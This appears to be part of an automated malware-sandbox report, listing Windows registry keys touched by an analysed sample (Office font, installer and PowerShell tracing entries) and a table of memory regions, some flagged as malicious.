HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
There are 332 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3889000
trusted library allocation
page read and write
malicious
795000
heap
page read and write
malicious
7C9000
heap
page read and write
malicious
63D0000
trusted library section
page read and write
malicious
4289000
trusted library allocation
page read and write
malicious
7B1000
heap
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
5D0000
heap
page read and write
2E3B000
heap
page read and write
74A000
heap
page read and write
4B4E000
stack
page read and write
10000
heap
page read and write
626000
heap
page read and write
2D1C000
heap
page read and write
5AA000
heap
page read and write
21C4000
heap
page read and write
4260000
trusted library allocation
page read and write
10016000
direct allocation
page execute and read and write
140000
heap
page read and write
3950000
heap
page read and write
683000
heap
page read and write
E80000
trusted library allocation
page read and write
2D28000
heap
page read and write
3E0000
trusted library allocation
page read and write
2C00000
heap
page read and write
3F3000
stack
page read and write
500000
trusted library allocation
page read and write
5E2E000
stack
page read and write
229E000
stack
page read and write
55A000
heap
page read and write
545000
heap
page read and write
2CA0000
heap
page read and write
8A5000
heap
page read and write
3ECB000
heap
page read and write
2CCE000
heap
page read and write
65D000
heap
page read and write
1D2000
trusted library allocation
page read and write
2A00000
trusted library allocation
page read and write
9C0000
trusted library allocation
page execute and read and write
49D000
heap
page read and write
2CAB000
heap
page read and write
4C7E000
stack
page read and write
4D43000
heap
page read and write
2CD9000
heap
page read and write
22FE000
stack
page read and write
2CB000
stack
page read and write
BD1000
heap
page read and write
29D6000
trusted library allocation
page read and write
160000
trusted library allocation
page read and write
4CD000
stack
page read and write
FFC000
trusted library allocation
page read and write
2D23000
heap
page read and write
4FBE000
stack
page read and write
2A50000
heap
page read and write
45D000
system
page execute and read and write
1D40000
direct allocation
page read and write
4D29000
heap
page read and write
4FAE000
stack
page read and write
2F000
heap
page read and write
CF2000
trusted library allocation
page read and write
2CF8000
heap
page read and write
474000
remote allocation
page execute and read and write
2E51000
heap
page read and write
2CA0000
heap
page read and write
2E72000
heap
page read and write
F26000
heap
page execute and read and write
8A0000
trusted library allocation
page read and write
2E72000
heap
page read and write
940000
heap
page read and write
5F7000
heap
page read and write
2CF8000
heap
page read and write
272F000
stack
page read and write
840000
trusted library allocation
page read and write
3641000
trusted library allocation
page read and write
BD8000
heap
page read and write
29D2000
trusted library allocation
page read and write
23D0000
heap
page read and write
4D56000
heap
page read and write
AA0000
heap
page read and write
830000
trusted library allocation
page read and write
4F2E000
stack
page read and write
28DD000
trusted library allocation
page read and write
38BE000
stack
page read and write
3B8D000
stack
page read and write
735000
heap
page read and write
2D0C000
heap
page read and write
284A000
trusted library allocation
page read and write
4B0000
heap
page read and write
54E000
stack
page read and write
C90000
trusted library allocation
page read and write
2430000
heap
page read and write
527000
heap
page read and write
176000
heap
page read and write
594000
heap
page read and write
2DE1000
heap
page read and write
37AF000
stack
page read and write
1011000
trusted library allocation
page read and write
B31000
heap
page read and write
613E000
stack
page read and write
288000
stack
page read and write
FFA000
trusted library allocation
page read and write
6B3000
heap
page read and write
5C5000
heap
page read and write
340000
heap
page execute and read and write
2B2000
stack
page read and write
2EE0000
heap
page read and write
4CE2000
heap
page read and write
510000
trusted library allocation
page read and write
32C000
stack
page read and write
1030000
trusted library allocation
page read and write
543F000
stack
page read and write
260000
heap
page read and write
5AF000
heap
page read and write
4DDE000
stack
page read and write
49CB000
stack
page read and write
3710000
heap
page read and write
102B000
stack
page read and write
23DF000
stack
page read and write
803000
heap
page read and write
163000
trusted library allocation
page execute and read and write
6EE000
stack
page read and write
CDE000
stack
page read and write
21FF000
stack
page read and write
7F0000
trusted library allocation
page execute and read and write
4AA000
heap
page read and write
61D000
heap
page read and write
1020000
trusted library allocation
page execute and read and write
77E000
heap
page read and write
6C2000
heap
page read and write
62D000
heap
page read and write
4260000
trusted library allocation
page read and write
2E5000
heap
page read and write
2C0000
heap
page read and write
23CE000
stack
page read and write
865000
heap
page read and write
430000
trusted library allocation
page read and write
4FCD000
heap
page read and write
770000
heap
page read and write
3FCF000
stack
page read and write
880000
heap
page read and write
DC000
stack
page read and write
524F000
stack
page read and write
2D0000
heap
page read and write
524E000
stack
page read and write | page guard
8A9000
heap
page read and write
18C000
stack
page read and write
2E6F000
heap
page read and write
387000
heap
page read and write
286000
stack
page read and write
66E000
heap
page read and write
F2E000
stack
page read and write
2D50000
heap
page read and write
5C0000
heap
page read and write
670000
heap
page read and write
36F000
heap
page read and write
2CA8000
heap
page read and write
158000
stack
page read and write
2A1000
heap
page read and write
265C000
trusted library allocation
page read and write
770000
heap
page read and write
2CD4000
heap
page read and write
2B4000
stack
page read and write
2641000
trusted library allocation
page read and write
5D0000
heap
page read and write
63A1000
heap
page read and write
2CA8000
heap
page read and write
F6E000
stack
page read and write
21B000
stack
page read and write
544000
heap
page read and write
E30000
trusted library allocation
page read and write
7EF000
heap
page read and write
95F000
stack
page read and write
1AC000
stack
page read and write
66F000
heap
page read and write
890000
trusted library allocation
page read and write
D6F000
stack
page read and write
2CD4000
heap
page read and write
2D3C000
heap
page read and write
20000
heap
page read and write
7A7000
heap
page read and write
F90000
heap
page read and write
6B9000
heap
page read and write
338000
heap
page read and write
AC000
stack
page read and write
2DBF000
stack
page read and write
4C2D000
stack
page read and write
4CB0000
heap
page read and write
910000
trusted library allocation
page read and write
64D000
heap
page read and write
33F000
stack
page read and write
267C000
trusted library allocation
page read and write
2B0E000
stack
page read and write
344000
heap
page read and write
5EBF000
stack
page read and write
2AAF000
stack
page read and write
FD0000
trusted library allocation
page read and write
FA0000
heap
page read and write
190000
trusted library allocation
page read and write
4D04000
heap
page read and write
160000
heap
page read and write
3EF000
stack
page read and write
41F000
system
page execute and read and write
269C000
trusted library allocation
page read and write
18A000
stack
page read and write
500D000
stack
page read and write
239E000
stack
page read and write
D9D000
stack
page read and write
37A9000
trusted library allocation
page read and write
25D000
stack
page read and write
61CE000
stack
page read and write
90000
heap
page read and write
430000
trusted library allocation
page read and write
EA0000
heap
page read and write
88000
stack
page read and write
67E000
heap
page read and write
28B7000
trusted library allocation
page read and write
3641000
trusted library allocation
page read and write
50E000
stack
page read and write
607000
heap
page read and write
288E000
stack
page read and write
7DB000
heap
page read and write
4260000
trusted library allocation
page read and write
4C90000
heap
page read and write
2CA4000
heap
page read and write
2CF6000
heap
page read and write
FE0000
trusted library allocation
page read and write
360000
heap
page read and write
4260000
trusted library allocation
page read and write
76E000
stack
page read and write
1E1000
heap
page read and write
23B0000
heap
page read and write
373F000
heap
page read and write
280000
heap
page read and write
3ECF000
stack
page read and write
3669000
trusted library allocation
page read and write
5AE000
stack
page read and write
2779000
trusted library allocation
page read and write
2E58000
heap
page read and write
4260000
trusted library allocation
page read and write
258000
heap
page read and write
2CC3000
heap
page read and write
4AAE000
stack
page read and write
4CF000
stack
page read and write
6C2000
heap
page read and write
51FF000
stack
page read and write
B38000
heap
page read and write
10B000
stack
page read and write
4A52000
heap
page read and write
4650000
heap
page read and write
100000
heap
page read and write
2CF8000
heap
page read and write
503D000
heap
page read and write
2434000
heap
page read and write
10000
heap
page read and write
E20000
trusted library allocation
page read and write
5EC0000
heap
page read and write
456000
system
page execute and read and write
534E000
stack
page read and write
7F7000
heap
page read and write
120000
trusted library allocation
page read and write
2F7000
heap
page read and write
58E000
heap
page read and write
D70000
heap
page read and write
63E000
heap
page read and write
10000
heap
page read and write
570000
heap
page read and write
C90000
heap
page read and write
32E000
stack
page read and write
D20000
trusted library allocation
page read and write
276000
heap
page read and write
2E52000
heap
page read and write
5B2000
heap
page read and write
4260000
trusted library allocation
page read and write
F20000
heap
page execute and read and write
29FE000
trusted library allocation
page read and write
591000
heap
page read and write
1096000
heap
page execute and read and write
4F0E000
stack
page read and write
477000
heap
page read and write
54F000
heap
page read and write
380000
heap
page read and write
